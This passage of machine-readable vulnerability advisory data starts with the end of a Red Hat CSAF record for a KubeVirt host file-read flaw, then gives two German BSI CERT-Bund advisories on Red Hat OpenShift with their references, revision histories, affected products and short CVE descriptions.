"8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64",
"8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64",
"8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64",
"8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64",
"8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64",
"8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64",
"8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64",
"8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64",
"8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-1798"
},
{
"category": "external",
"summary": "RHBZ#2117872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-1798",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1798"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798"
},
{
"category": "external",
"summary": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm",
"url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"
}
],
"release_date": "2022-08-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-22T08:16:30+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6681"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs"
}
]
}
wid-sec-w-2022-1312
Vulnerability from csaf_certbund
Published
2022-09-06 22:00
Modified
2024-03-07 23:00
Summary
Red Hat OpenShift: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff
Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Informationen offenzulegen und Sicherheitsmaßnahmen zu umgehen.
Betroffene Betriebssysteme
- UNIX
- Linux
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Informationen offenzulegen und Sicherheitsma\u00dfnahmen zu umgehen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- UNIX\n- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2022-1312 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2022-1312.json"
},
{
"category": "self",
"summary": "WID-SEC-2022-1312 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-1312"
},
{
"category": "external",
"summary": "RHSA-2022:6351 - Security Advisory vom 2022-09-06",
"url": "https://access.redhat.com/errata/RHSA-2022:6351"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2022:3333-1 vom 2022-09-22",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012328.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:6681 vom 2022-09-22",
"url": "https://access.redhat.com/errata/RHSA-2022:6681"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2022:3335-1 vom 2022-09-22",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012327.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2022:3334-1 vom 2022-09-22",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012329.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:6890 vom 2022-10-11",
"url": "https://access.redhat.com/errata/RHSA-2022:6890"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2DOCKER-2022-020 vom 2022-10-14",
"url": "https://alas.aws.amazon.com/AL2/ALASDOCKER-2022-020.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2-2022-1863 vom 2022-10-21",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1863.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2-2022-1861 vom 2022-10-21",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1861.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2-2022-1858 vom 2022-10-21",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1858.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2-2022-1860 vom 2022-10-21",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1860.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2-2022-1865 vom 2022-10-21",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1865.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2-2022-1864 vom 2022-10-21",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1864.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2-2022-1862 vom 2022-10-21",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1862.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:8609 vom 2022-11-23",
"url": "https://access.redhat.com/errata/RHSA-2022:8609"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:0814 vom 2023-02-20",
"url": "https://access.redhat.com/errata/RHSA-2023:0814"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:2002-1 vom 2023-04-25",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-April/014584.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:3229 vom 2023-05-19",
"url": "https://access.redhat.com/errata/RHSA-2023:3229"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:3557 vom 2023-06-10",
"url": "https://access.redhat.com/errata/RHSA-2023:3557"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2024:0799-1 vom 2024-03-07",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-March/018108.html"
}
],
"source_lang": "en-US",
"title": "Red Hat OpenShift: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2024-03-07T23:00:00.000+00:00",
"generator": {
"date": "2024-03-08T10:10:23.986+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.0"
}
},
"id": "WID-SEC-W-2022-1312",
"initial_release_date": "2022-09-06T22:00:00.000+00:00",
"revision_history": [
{
"date": "2022-09-06T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2022-09-22T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von SUSE und Red Hat aufgenommen"
},
{
"date": "2022-10-11T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2022-10-13T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Amazon aufgenommen"
},
{
"date": "2022-10-23T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Amazon aufgenommen"
},
{
"date": "2022-11-22T23:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-02-20T23:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-04-25T22:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-05-18T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-06-11T22:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-03-07T23:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von SUSE aufgenommen"
}
],
"status": "final",
"version": "11"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Amazon Linux 2",
"product": {
"name": "Amazon Linux 2",
"product_id": "398363",
"product_identification_helper": {
"cpe": "cpe:/o:amazon:linux_2:-"
}
}
}
],
"category": "vendor",
"name": "Amazon"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version",
"name": "Cryostat 2 build",
"product": {
"name": "Red Hat Enterprise Linux Cryostat 2 build",
"product_id": "T026436",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:cryostat_2_build"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "Virtualization \u003c 4.10.5",
"product": {
"name": "Red Hat OpenShift Virtualization \u003c 4.10.5",
"product_id": "T024475",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:virtualization__4.10.5"
}
}
},
{
"category": "product_version",
"name": "GitOps 1.8",
"product": {
"name": "Red Hat OpenShift GitOps 1.8",
"product_id": "T026902",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:gitops_1.8"
}
}
},
{
"category": "product_version",
"name": "GitOps 1.9",
"product": {
"name": "Red Hat OpenShift GitOps 1.9",
"product_id": "T028023",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:gitops_1.9"
}
}
}
],
"category": "product_name",
"name": "OpenShift"
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-1798",
"notes": [
{
"category": "description",
"text": "Es existiert eine Schwachstelle in Red Hat OpenShift. Der Fehler besteht, weil es m\u00f6glich ist, die kubeVirt-API zu nutzen, um auf Host-Dateien in einer KubeVirt-VM zuzugreifen. Ein entfernter, authentisierter Angreifer kann diese Schwachstelle ausnutzen, um vertrauliche Informationen offenzulegen."
}
],
"product_status": {
"known_affected": [
"T028023",
"T002207",
"67646",
"T026902",
"398363",
"T026436"
]
},
"release_date": "2022-09-06T22:00:00Z",
"title": "CVE-2022-1798"
},
{
"cve": "CVE-2022-1996",
"notes": [
{
"category": "description",
"text": "Es existiert eine Schwachstelle in Red Hat OpenShift. Der Fehler besteht aufgrund eines benutzergesteuerten Schl\u00fcssels im GitHub-Repository emicklei/go-restful. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um die Sicherheitsma\u00dfnahmen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028023",
"T002207",
"67646",
"T026902",
"398363",
"T026436"
]
},
"release_date": "2022-09-06T22:00:00Z",
"title": "CVE-2022-1996"
}
]
}
wid-sec-w-2023-0204
Vulnerability from csaf_certbund
Published
2023-01-25 23:00
Modified
2023-08-06 22:00
Summary
Red Hat OpenShift: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.
Betroffene Betriebssysteme
- Linux
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2023-0204 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-0204.json"
},
{
"category": "self",
"summary": "WID-SEC-2023-0204 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0204"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:4488 vom 2023-08-07",
"url": "https://access.redhat.com/errata/RHSA-2023:4488"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:3915 vom 2023-07-06",
"url": "https://access.redhat.com/errata/RHSA-2023:3915"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:3914 vom 2023-07-06",
"url": "https://access.redhat.com/errata/RHSA-2023:3914"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:3664 vom 2023-06-19",
"url": "https://access.redhat.com/errata/RHSA-2023:3664"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:3642 vom 2023-06-15",
"url": "https://access.redhat.com/errata/RHSA-2023:3642"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:3542 vom 2023-06-14",
"url": "https://access.redhat.com/errata/RHSA-2023:3542"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:1326 vom 2023-05-18",
"url": "https://access.redhat.com/errata/RHSA-2023:1326"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:1328 vom 2023-05-18",
"url": "https://access.redhat.com/errata/RHSA-2023:1328"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:2253 vom 2023-05-09",
"url": "https://access.redhat.com/errata/RHSA-2023:2253"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:2282 vom 2023-05-09",
"url": "https://access.redhat.com/errata/RHSA-2023:2282"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:2283 vom 2023-05-09",
"url": "https://access.redhat.com/errata/RHSA-2023:2283"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:2357 vom 2023-05-09",
"url": "https://access.redhat.com/errata/RHSA-2023:2357"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:2367 vom 2023-05-09",
"url": "https://access.redhat.com/errata/RHSA-2023:2367"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:1529 vom 2023-03-30",
"url": "https://access.redhat.com/errata/RHSA-2023:1529"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:1042 vom 2023-03-07",
"url": "https://access.redhat.com/errata/RHSA-2023:1042"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:0895 vom 2023-02-28",
"url": "https://access.redhat.com/errata/RHSA-2023:0895"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:0890 vom 2023-02-28",
"url": "https://access.redhat.com/errata/RHSA-2023:0890"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:0408 vom 2023-01-25",
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:0566 vom 2023-02-07",
"url": "https://access.redhat.com/errata/RHSA-2023:0566"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:0652 vom 2023-02-15",
"url": "https://access.redhat.com/errata/RHSA-2023:0652"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:0769 vom 2023-02-21",
"url": "https://access.redhat.com/errata/RHSA-2023:0769"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:0774 vom 2023-02-22",
"url": "https://access.redhat.com/errata/RHSA-2023:0774"
}
],
"source_lang": "en-US",
"title": "Red Hat OpenShift: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2023-08-06T22:00:00.000+00:00",
"generator": {
"date": "2024-02-15T17:11:52.533+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.0"
}
},
"id": "WID-SEC-W-2023-0204",
"initial_release_date": "2023-01-25T23:00:00.000+00:00",
"revision_history": [
{
"date": "2023-01-25T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2023-02-06T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-02-14T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-02-20T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-02-21T23:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-02-28T23:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-03-06T23:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-03-29T22:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-05-09T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-05-18T22:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-06-14T22:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-06-15T22:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-06-19T22:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-07-05T22:00:00.000+00:00",
"number": "14",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2023-08-06T22:00:00.000+00:00",
"number": "15",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "15"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform \u003c 4.12.1",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c 4.12.1",
"product_id": "T025202",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.11",
"product": {
"name": "Red Hat OpenShift Container Platform 4.11",
"product_id": "T025990",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform_4.11"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift \u003c 4.12.0",
"product": {
"name": "Red Hat OpenShift \u003c 4.12.0",
"product_id": "T026026",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.12.0"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.12",
"product": {
"name": "Red Hat OpenShift Container Platform 4.12",
"product_id": "T026435",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform_4.12"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.13",
"product": {
"name": "Red Hat OpenShift Container Platform 4.13",
"product_id": "T027760",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform_4.13"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform \u003c 4.11.43",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c 4.11.43",
"product_id": "T028132",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.11.43"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift Developer Tools and Services 4.11",
"product": {
"name": "Red Hat OpenShift Developer Tools and Services 4.11",
"product_id": "T028205",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:developer_tools_and_services_4.11"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform \u003c 4.11.44",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c 4.11.44",
"product_id": "T028416",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.11.44"
}
}
}
],
"category": "product_name",
"name": "OpenShift"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-38561",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2021-38561"
},
{
"cve": "CVE-2021-44716",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2021-44716"
},
{
"cve": "CVE-2021-44717",
"notes": [
{
"category": "description",
